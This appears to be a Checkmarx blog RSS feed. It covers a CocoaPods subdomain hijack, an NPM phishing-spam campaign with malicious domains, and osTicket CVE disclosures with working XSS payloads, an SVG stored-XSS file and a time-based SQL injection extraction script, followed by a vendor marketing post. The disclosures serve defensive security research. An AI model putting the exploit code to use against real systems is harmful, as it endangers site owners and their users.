I disclosed the findings to CocoaPods in this GitHub issue, and huge respect for the fast response and removing the subdomain record.

It’s ridiculous how easy it is to take over an abandoned subdomain. This made me wonder – should this be that easy? Should GitHub enforce 2-way validation when linking a domain to a GitHub Pages project? Like validating the exact repository URL? IMHO – yes.

See this case as a warning if you have created subdomain records for side-projects that over time became obsolete, like cdn2.cocoapods.org. I suggest removing them, as someone might hijack your subdomain.

]]>
CocoaPods Subdomain Hijacked: This is How - Checkmarx.com In a subdomain hijacking attack, the attacker can find forgotten settings on free hosting websites such as GitHub Pages, which are not mapped anymore. The weak validation grants attackers permission to use those subdomains. Application Security Testing,AppSec,article,Developer,English,Open Source Security,Supply Chain Security
How NPM Packages Were Used to Spread Phishing Links https://checkmarx.com/blog/how-npm-packages-were-used-to-spread-phishing-links/ Tue, 21 Feb 2023 18:28:45 +0000 https://checkmarx.com/?p=81849

Unveiling the Latest NPM Ecosystem Threat: Thousands of SPAM Packages Flood the Network, A New Discovery by Checkmarx

What Happened?

  • A sudden surge of thousands of SPAM packages were uploaded to the NPM open-source ecosystem from multiple user accounts within hours.
  • Further investigation uncovered a recurring attack method, in which cyber attackers utilize spamming techniques to flood the open-source ecosystem with packages that include links to phishing campaigns in their README.md files.
  • The packages were created using automated processes, with project descriptions and auto-generated names that closely resembled one another.
  • The Attackers referred to retail websites using referral IDs, thus profiting from the referral rewards they earned.
  • The packages appeared to contain the very same automation code used to generate these packages, probably uploaded by mistake by the attacker.
  • As first recognized in this tweet by Jesse Mitchell, the generating scripts also include valid credentials used by the attacker in the attack flow.

NPM Anomalies

Our technology collects and indexes evidence related to packages from all open-source ecosystems, allowing us to query historical data for new insights.

On Monday, 20th of February, Checkmarx Labs discovered an anomaly in the NPM ecosystem when we cross-referenced new information with our databases. Clusters of packages had been published in large quantities to the NPM package manager. Further investigation revealed that the packages were part of a trending new attack vector, with attackers spamming the open-source ecosystem with packages containing links to phishing campaigns. We reported on a similar attack last December.

In this situation, it seems that automated processes were used to create over 15,000 packages in NPM and related user accounts. The descriptions for these packages contained links to phishing campaigns. Our team alerted the NPM security team.

Phishing Sites in Package Description

The attackers used a large number of packages with names related to hacking, cheats, and free resources to promote their phishing campaign. Some of the package names included “free-tiktok-followers,” “free-xbox-codes,” and “instagram-followers-free”. These names were designed to lure users into downloading the packages and clicking on the links to the phishing sites.

The descriptions of all the packages we found contained links to phishing sites.

The messages in these packages attempt to entice readers into clicking links with promises of game cheats, free resources, and increased followers and likes on social media platforms like TikTok and Instagram.

The phishing campaign linked to many unique URLs across many domains, with each domain hosting multiple phishing webpages under different paths. The deceptive webpages are well-designed and, in some cases, even include fake interactive chats that appear to show users receiving the game cheats or followers they were promised.

These chats will even respond to messages if the reader chooses to participate, but these are all automated and fabricated. This highlights the need for caution when interacting with links in packages and the importance of only using trusted sources.

The websites included built-in fake flow that pretended to process data and generate the promised “gifts.” However, this process most of the time failed, and the victim was then asked to enter a “human verification” phase that involved multiple sites referring the user from one to another. These sites included surveys that asked the user to respond to various questions, leading to additional surveys or eventually to legitimate eCommerce websites. This shows the importance of being cautious when interacting with links in packages and only using trusted sources.

Referrals Rewards

While investigating the phishing websites, we noticed that some of them redirected to eCommerce websites with referral IDs. For example, one of our experiments resulted in being redirected to AliExpress, one of the world’s largest online retail platforms. Like many other retail websites, AliExpress offers a referral program that rewards members for referring new customers to the platform. If the threat actors refer their victims to AliExpress and they make a purchase, the threat actors’ account will receive a referral reward in the form of a coupon or store credit. This highlights the potential financial gain for threat actors who engage in phishing campaigns like this one.

Did the Attacker make a mistake?

Throughout many of the packages we found similar python scripts with similar functions that seemed to be the ones automatically generating and publishing the spam packages. Other than that, we found other “helper.txt” files that seemed to also be a part of the automated mechanism. The most interesting file is a python script within the NPM packages that includes all steps of the package publication.

The flow of the Python script are as follows:

  • Defines folder paths containing configuration files.
  • In some cases defines a list of website URLs and their login credentials (which later uses to publish there the link of the uploaded package).
  • Loops through the folder paths and read configuration files to get a domain name and keyword.
  • Generates random titles and descriptions using the configuration files.
  • Generates a random link for new content using the title along with a random number.
  • Creates the following files: index.js, package.json, and README.md based on templates and modifies them to include the new link and titles.
  • Uploads the new package to NPM using the npm publish command.
  • Checks if the upload was successful and writes the URL to a file.

Generating random content for new NPM packages

Generating package files and publishing to NPM

After completing the publication of all packages in the current batch, the attacker goes on to the last automated task.

From what we see thus far, the attacker created or at least has access to several news-like websites in which they can publish content.

The last task in the python scripts is appending links to unrelated posts in these new-like websites. These links direct to the webpages of the packages they published on NPM’s website.

To do that, the attacker uses the “selenium” python package to interact with these wordpress websites. First, they need to authenticate as an editor, and only then continue to post the package’s links.

We believe uploading these PyPi scripts wen’t done intentionally by the attacker. A significant sign is that the scripts include the credentials used to authenticate with the WordPress websites, as was first recognized in this tweet by Jesse Mitchell.

Conclusion

These attackers invested in automation in order to poison the entire NPM ecosystem with over 15,000 packages. This allowed them to publish a large number of packages in a short period of time, making it difficult for the different security teams to identify and remove the packages quickly. The attackers also created many user accounts, making it difficult to trace the source of the attack. This shows the sophistication and determination of these attackers, who were willing to invest significant resources in order to carry out this campaign. Interestingly, it appears that this is the same attacker as a previous spam attack we detected last December.

The battle against threat actors poisoning our software supply chain ecosystem continues to be a challenging one, as attackers constantly adapt and surprise the industry with new and unexpected techniques.

By working together, we can stay one step ahead of attackers and keep the ecosystem safe. We believe this kind of collaboration is crucial in the fight against software supply chain attacks, and we will continue working together to help protect the open-source ecosystem.

List of Packages

The scale of this phishing campaign is significant, and you are welcome to download the full dataset hosted on GitHub Gist

https://gist.github.com/masteryoda101/a3f3500648f7e6da7bf89b3fb210e839

This will allow you to further analyze the data and gain a better understanding of the scope and nature of the attack.

If you would like access to the original metadata or samples from this phishing campaign, please feel free to send an email to supplychainsecurity@checkmarx.com. Our team will be happy to provide you with the information you need.

IOC

In total, we analyzed over 190 unique URLs (click to get the full list), which we were able to reduce to approximately 31 domains.

betapps[.]club

stumblegems[.]site

tubemate[.]vip

followersfree[.]store

apostasesportiva[.]info

sahel-digital-art[.]org

xapk[.]online

dailyspins[.]store

press-citizen-media[.]com

rebrand[.]ly

t[.]co

shahidvip[.]com

newjesuitreview[.]org

nbadeadlines[.]com

fundacionsuma[.]org

nftscollection[.]online

legalcoins[.]vip

canva-pro-free-accounts[.]

blogspot[.]com

trendcoffee[.]cc

journaldogs[.]com

free4free[.]monster

redapk[.]xyz

elavil[.]store

hiromi-haneda[.]com

claptonfc[.]info

coolhack[.]us

generators[.]searchbuzz[.]co

baby-ace[.]net

crestor[.]store

nfljerseys[.]fun

]]>
Securing Open-Source Solutions: A Study of osTicket Vulnerabilities https://checkmarx.com/blog/securing-open-source-solutions-a-study-of-osticket-vulnerabilities/ Tue, 14 Feb 2023 15:48:44 +0000 https://checkmarx.com/?p=81721 Nowadays, there are open-source solutions for every type of need. From accounting to CMS (Content Management System) applications, we can search for an application on the Internet that offers a solution to a specific issue or answers a need. Although, most of the time, it will be easier/faster than reinventing the wheel, using open-source applications might create some challenges. Security is one of those challenges, and zero-day vulnerabilities might put open-source users at risk.

With that in mind, one of the activities performed by Checkmarx Labs is to search for security issues in open-source applications. The goal is to help secure open-source software which, usually, is not developed with a security-first approach, and is used by a community that often does not have the means to secure the open-source software.

One of the applications assessed was osTicket, an open-source ticketing system. With distinctive features and plugins, osTicket gives users the ability to “Manage, organize, and archive all your support requests and responses (…).” During our assessment, the Checkmarx Labs team found some interesting vulnerabilities. In this blog/report, not only will we disclose some of the identified vulnerabilities but also elaborate on the team’s approach to identifying them.

Research Lab

The process that we follow, from creating a testing instance with the open-source application to finding the vulnerabilities, includes several steps. One of the first steps is to perform a static analysis scan (SAST) of the project, which will scan the code and find data flows that could lead to possible vulnerabilities. The use of this method often increases the number of issues found and is very useful when conducting these assessments. To validate the exploitability of the scan findings, we create a virtual machine (VM) and install the application in order to have a local testing environment for further testing. This way, we can confirm the existence of vulnerabilities and widen the assessment scope by performing a full penetration test, using both manual and automatic methodologies.

Methodology

After finalizing the first steps, we analyze scan results and identify the flows that lead to identified vulnerabilities. Although the scan simplifies the process, we also need to understand the application source code to find the “vulnerability entry point” (the input), and the flows that can be exploited. For example, during the analysis of the results, we identified some strange code injection results ending at “variable variables” [1]. This meant that user input controlled the variable name, and although this is not uncommon, it is a dangerous behavior—especially when user input is used.

Figure 1 – Variable $sort, from the GET parameter, controlling the initial part of the variable name $x

In this case, the string “_sort” was added to the variable before its usage. We could not find any interesting variable name with that pattern. So, while the code is potentially weak to overwriting arbitrary variables, they would have to end in “_sort”. This means the code does have a weakness but is not exploitable in a meaningful way.

There were a few different SAST results on this matter, and we decided to look further:

Figure 2 – Request parameter concatenated to a raw HTML string at a user-controlled variable

At the directory.inc.php file, the $_REQUEST parameter was added directly to this string which appeared to be an HTML string, and yes, it was being used in multiple table headers. And of course, it would not be so simple.

We discovered that osTicket had a custom HTML sanitization method that was applied in many other HTML inputs, and it was not a very standard method for sanitizing input:

Figure 3 – Request parameters filtered before usage in directory.inc.php

This is an example piece of their sanitization method:

Figure 4 – A fraction of the Format: sanitize blacklist function

Although this method has some complexity, blacklisting specific strings and focusing on sanitizing HTML tags is not an effective way to sanitize the input, since it is difficult to be aware of every possible context and special characters that can be used to build an exploit.

After this analysis, we tried the only thing left, which was to confirm the vulnerability (in a local testing environment) explained in the Reflected XSS, CVE-2022-32132 section below.

To confirm the vulnerabilities existence in the application, we created our own environment by setting up the application in a VM, and then perform the dynamic tests. With this environment, we not only confirmed the results found, but we could also find different vulnerabilities that are easier to find with our dynamic testing approach.

Findings

Reflected XSS, CVE-2022-32132

A Reflected XSS [2] was found in osTicket, allowing an attacker to inject malicious JavaScript into a browser’s DOM, which could enable attackers to hijack user sessions, perform actions on a user’s behalf within that user’s session context, and more.

After the analysis described in the Methodology, we validated that the vulnerability does exist in the application. Our first goal was to understand and escape the sanitizer. Sure enough, some special characters allowed us to discover this Reflected XSS vulnerability in the ‘directory’ URL, which is available by default in every osTicket installation. The blacklist was prepared to block user input from escaping HTML tags or even create dangerous tags like <script>, but on this specific scenario, the input was added to an attribute, and it allowed escaping from attributes. One of the obvious payloads was using the onmouseover attribute, which runs its value as JavaScript when the mouse moves over the component.

Figure 5 – XSS payload executed

Figure 6 – Source page code with the XSS payload

There are some things that can be done to increase the value (or risk) of this vulnerability, and the first thing is to make it easier for the victim to be attacked. An easy way of achieving this is to also inject the style attribute of the vulnerable HTML tag in order to make it the size of the screen, being almost inevitable for the victim to visit the URL and trigger the payload.

/scp/directory.php?&&order=DESCE%22%20onmouseover=%22alert(1)%22%20style=%22position:fixed;top:0px;right:0;bottom:0px;left:0px;&sort=name

Another thing that can be done is to leverage this vulnerability by using other weaknesses. We found two cases that can be abused for that purpose:

  • A stored HTML injection in the “notes” section can be abused to have a permanent attack vector inside the application that redirects the user to the Reflected XSS, making it in practice, a stored XSS.
  • A CSRF in the “change password” functionality can be used as a payload for the XSS, allowing an attacker to change the user password of the victim.

As the directory.php page is in an admin panel, these steps could leverage this vulnerability from a simple Reflected XSS to a Stored XSS capable of full admin account takeover without the need of any installed plugins.

Reflected XSS, CVE-2022-31889

In the Audit plugin, we found two Reflected XSS results where user input from the type or state parameters was inserted into the HTML without being sanitized. The fix adds the missing sanitization for these inputs. A similar procedure to the one presented in the Methodology section, was taken when analyzing the plugins results.

After the analysis, and confirmation that it was a True Positive, we validated that it was indeed vulnerable to XSS. Looking at the code in which the vulnerability occurs, we can see how easily it can be exploited:

Figure 7 – type variable insert in the HTML without sanitization

The input from the type and state parameters is inserted into the “a” tag without any sanitization. We can just close the href quote and the tag (>) and insert a simple script tag.

Figure 8 – XSS payload executed

Figure 9 – Source page code with the XSS payload

SQL injection, CVE-2022-31890

In the same plugin (Audit), we came across a SQL Injection result where user input from the order parameter was inserted into a SQL query without proper sanitization. Looking at the fix, there was a condition in the if statement in the old code that verified if the order query parameter existed in the orderWay array. The problem is that this array was not defined, so PHP will issue a Notice and the if condition will always be false. The correction involved adding the missing array and changing some of the sanitization logic for the order variable.

Figure 10 – order_by variable concatenated directly into SQL query

After confirming that the flow was indeed vulnerable, a Proof-of-Concept was created to demonstrate the real impact, as shown in Figure 13. By exploiting the SQL injection vulnerability, an attacker could obtain passwords hashes, PII, and access privilege information. The fact that the injection is after an ORDER BY makes the possible injection limited. A SQL injection after the ORDER BY clause is different from other cases (after a WHERE clause for example) because the database does not accept UNION, WHERE, OR, or AND keywords. It is possible to have nested queries, and we can also have multiple queries if we use a semicolon, but this is only possible if the method that executes the queries allows multiple queries execution. In this case, the method that executes the queries does not allow multiple queries. Nonetheless, a blind time-based injection is possible, allowing data extraction from the database.

Example of a regular request:

Figure 11 – Normal request to the audits.php page

Sleep injection:

Figure 12 – Sleep injection result in the audits.php page

With this knowledge, we can create a script that allows data extraction that triggers a sleep when a particular condition is met, like a specific character in the user’s table that matches one provided by us.

import requests
import urllib
import string
HOSTNAME = 'http://localhost'
cookie = {'OSTSESSID': '...'}
headers = {'User-Agent': '...'}
alphabet = string.ascii_lowercase + string.digits + '-_!'
position = 1
offset = 0
for letter in alphabet:
    payload = "(select case when ((select substring(username," + str(position) + ",1) from os_staff LIMIT 1 OFFSET " + str(offset) + ")='" + letter + "') then sleep(0.3) else 1 end);"
    result = requests.get(HOSTNAME + '/scp/audits.php?&type=S&state=All&order=ASC,' + urllib.parse.quote(payload) +'--&sort=timestamp&_pjax=%23pjax-container', cookies=cookie, headers=headers)
    if result.elapsed.total_seconds() > 2:
        print(letter)
        break

Figure 13 – Python script that obtains the first username character of the first os_staff table entry

Session fixation, CVE-2022-31888

SAST tools increases the number of security issues that can be found, and yet code analysis is not enough when trying to find all kinds of problems. For example, we found a session fixation issue while interacting with the application that, with code review, is difficult to notice.

Due to the nature of the problem, detecting that a new session is generated and the old one is terminated in the correct place is complex to detect. Most of the time, a clear understanding of the code base is required to spot a session fixation issue, but this can also be applied to other types of vulnerabilities that can be chained together and create a higher risk. Dynamic testing is also necessary if we want to find other types of vulnerabilities, or vulnerabilities that trigger only in specific situations.

In this case, the application provides two login pages, one for the admin panel and another for the user portal. While testing both interfaces, the existing session cookie (used in both interfaces) is not invalidated after a login.

We found this vulnerability while fuzzing the login pages. When a login is successful, the server should invalidate the previous session and create a new one by sending it in the Set-Cookie header. This did not happen, and it was also possible to define our own session.

Figure 14 – Set-Cookie with controlled cookie

Figure 15 – Session cookie controlled

If an attacker can access or control the session value before authentication, an authenticating user would be authenticating a session known to the attacker, who would then hijack it.

Stored XSS, CVE-2022-32074

While dynamically analyzing the Filesystem Storage plugin, we came across two issues:

1 – It’s possible to browse directly to the root of the file upload directory (in this example, the name chosen for the folder is file_uploads). With this, a directory listing is possible, as shown below.

Figure 16 – File uploads directory content

2 – Images accessible via this storage do not properly neutralize SVG files, which can contain XSS payloads. For example, uploading the following XML inside a JPG file will serve its contents as SVG.

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="200" height="200" style="fill:rgb(0,255,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert("Stored XSS!!");
   </script>
</svg>

By exploiting these two issues, we were able to find a Stored XSS.

Figure 17 – XSS payload executed after accessing the image

Conclusion

While the injection vulnerabilities such as SQLi and XSS are some of the security issues with more widespread knowledge and mitigation techniques, they are still at the top of vulnerabilities found. According to an Akamai report “the top three web application attacks were LFI (38%), SQLi (34%), and XSS (24%).”

These issues mainly arise because developers do not take into consideration that all data should be sanitized. Whether coming from user input or a database, the data should always be sanitized. There are also cases where custom sanitizers are implemented, and what happens is that developers’ implementation does not consider all cases. As a result, attackers can find ways to bypass the sanitizer [3].

OWASP provides a Cheat Sheet series that developers can use to understand the vulnerabilities and how to prevent them [4] [5].

The research was conducted in testing environments, and no production systems were used to test or exploit the previously mentioned vulnerabilities.

Timeline

  • April 20, 2022 – Full vulnerabilities report shared with osTicket team.
    • osTicket team acknowledged receipt.
  • May 19, 2022 – Fix released.
  • June 22, 2022 – CVE-2022-31888, CVE-2022-31889, CVE-2022-31890 assigned.
  • July 13, 2022 – CVE-2022- 32074 assigned.
  • July 21, 2022 – CVE-2022-32132 assigned.
  • February 14, 2023 – Public disclosure

Final Words

It was a pleasure working with osTicket’s security team. Their professionalism and cooperation, as well as the prompt ownership they took, are what we hope for when we engage with software companies. Kudos!

This type of research activity is part of the Checkmarx Security Research Team’s ongoing efforts to drive the necessary changes in software security practices among organizations who offer online services in an effort to improve security for everyone overall.

References

[1] https://www.php.net/manual/en/language.variables.variable.php

[2] https://portswigger.net/web-security/cross-site-scripting/reflected

[3] https://owasp.org/www-community/Injection_Theory

[4] https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html

[5] https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html

Copyright (C) 1989, 1991 Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed.

]]>
Open Source vs Commercial AppSec Tools: Considerations for Enterprise https://checkmarx.com/blog/open-source-vs-commercial-appsec-tools-considerations-for-enterprise/ Wed, 01 Feb 2023 13:00:00 +0000 https://checkmarx.com/?p=81264

There are a plethora of free and Open Source AppSec testing tools available on the internet and many of them are quite good – some top-of-mind shining examples (picked at random, of course) are KICS, DustiLock, and ChainAlert. With so many free and open source AppSec tools available, it may be tempting to question, “do enterprises really need to purchase Application Security Testing solutions?”  After all, most organizations have teams of in-house developers who are naturally inclined to the line of thinking of we can build that, or why pay for something we can get for free? And any CISO would be remiss if he or she didn’t consider at least some free tools, to help keep expenses to a minimum and organizational leadership happy.

However, as tempting as it may be to roll up your sleeves and follow an entirely free and open-source approach to AppSec testing solutions, CISOs and AppSec teams need to be aware of all of the considerations when it comes to building or selecting AppSec solutions, including total cost of ownership (TCO), opportunity cost of building, integrating, and maintaining custom AppSec solutions, and keeping abreast of the ever changing attack landscape. All of these factors culminate into overall risk—risk to an organization’s data, its customers, and its reputation.

Total Cost of Ownership (TCO) and Opportunity Cost

Most free or open-source tools are technology-specific (e.g., language, framework, technology). This means to adequately cover and help secure custom application code, third-party code, infrastructure as code, APIs, or other software attack vectors (e.g., software supply chain), many different tools are needed and often one suite of tools won’t work across multiple projects. This produces a disjointed approach to AppSec within DevSecOps and relegates control to individual developers with little oversight from security teams or executives.

Pragmatically, these tools all work differently, they do not integrate, they are rigid in terms of how they may be implemented, and they do not scale to an enterprise level. To integrate effectively, organizations will need to devote man hours building, plumbing, and operationalizing them along with their required supporting infrastructure and applications (whether on-premises, or in the cloud). This also means that organizations will need to devote time and resources to updating, maintaining, and troubleshooting these solutions, ultimately increasing the total cost of ownership (TCO) of these otherwise free tools.

Moreover, AppSec leaders and CISOs need to weigh the opportunity costs of Dev and DevOps teams not focusing on building or facilitating the production of the enterprise’s actual product. As an example, if your organization’s primary product is mobile applications, any developer, DevOps, or Security time spent customizing, integrating, or modifying AppSec testing software to meet the enterprise’s needs is time not spent building mobile apps.

Deploying, integrating, and maintaining custom solutions is only half the battle. Factor in the various results across multiple scan engines, such as SAST, SCA, SCS, API Security, and Infrastructure-as-Code, it becomes readily apparent that being able to consume and prioritize results within a single platform can save significant time and overhead in identifying and remediating risks in applications.

Commercial products also come with a simple, predictable cost structure, which makes budgeting and planning AppSec initiatives and calculating ROI much easier.

Siloed Knowledge and Threat Intelligence

Most AppSec professionals (or teams) are knowledgeable about pockets of vulnerabilities, application code weaknesses, runtime environments, developer operations, technology stacks in use, and available tooling; as such, they are only able to provide expertise that is narrowly focused and may not encompass the entire attack landscape of an organization. For this reason, many (if not most) companies (even the big ones) either need or want to leverage the expertise of application security companies—from a product or partnership perspective.

Building a completely bespoke or piecewise AppSec solution introduces a significant risk of “unknown unknowns,” where organizations can potentially suffer from tunnel vision, focusing only on security vulnerabilities or exploits they or their teams have observed. This has the potential to introduce significant blind spots and overlooked vulnerabilities with potential dire consequences – with the ever evolving threat landscape, relying on internal teams or unknown (hopefully) benevolent open source contributors may result in organizations being reactive rather than proactive, subjecting it to potential, existential risk.

One particularly illuminating example is without the benefit of supply chain security capabilities, developers and AppSec teams would have to continuously monitor social media or GitHub comments for all versions of the open source packages they’re using within their projects, both explicitly and as dependencies, which could easily number in the hundreds of thousands.

Support, Maintenance, and Updates

Another pitfall to consider when it comes to open source or free solutions is they often do not offer the same level of customer support relative to that of a commercial AppSec solution.  Software or feature support aside, consultation, planning, education, and developer adoption services are all lacking or non-existent for free or open-source solutions. Consumers of these kinds of solutions (vs. commercial) will have to navigate significant overhead to manage many disparate tools, slow reactions (by maintainers of the tool) as threats emerge or change, and incomplete or defective offerings where nobody can be held accountable.

Support and services aside, commercial AppSec solutions offer consistent and reliable updates and maintenance. Commercial AppSec vendors have quality-focused teams to test and validate their application and software updates prior to their release. In contrast, open-source projects typically rely on a community of engaged volunteers to perform quality assurance functions ad-hoc, then report findings back to project maintainers.

Checkmarx itself has several open-source application security testing projects that are very active and are updated on a daily or weekly basis. Today, a quick review of our very active projects shows dozens of open issues and pull requests that ostensibly fix defects or proliferate new capabilities that are needed by the community. This merely reiterates that the responsiveness in open-source projects to issues and challenges—even for projects that are highly crowd-sourced and supported diligently—are, in most cases, not sufficient (on their own) for enterprises.

Conclusion

Ultimately, the decision to approach AppSec testing using either open source and in-house developed tools or commercial AppSec solutions boils down to risk. Organizations and enterprises have a risk budget much in the same way they have an OPEX or CAPEX budget—and the two are inversely proportional. While open source or in-house developed AppSec solutions minimize upfront or short-term costs, it’s at the expense of operations, maintainability, flexibility, and risk exposure.

For enterprises, while free and open-source tools can augment an existing AppSec program or solution, they simply cannot meet the organization’s needs in terms of ease-of-use, maintainability, or service and support on their own. 

About Checkmarx

Checkmarx’s comprehensive and integrated Application Security Testing Platform provides a robust, flexible, and extensible AppSec solution that allows organizations to leverage our years of experience, research, and understanding in an easy-to-use platform.

Reach out for a live demo today to see for yourself!

]]>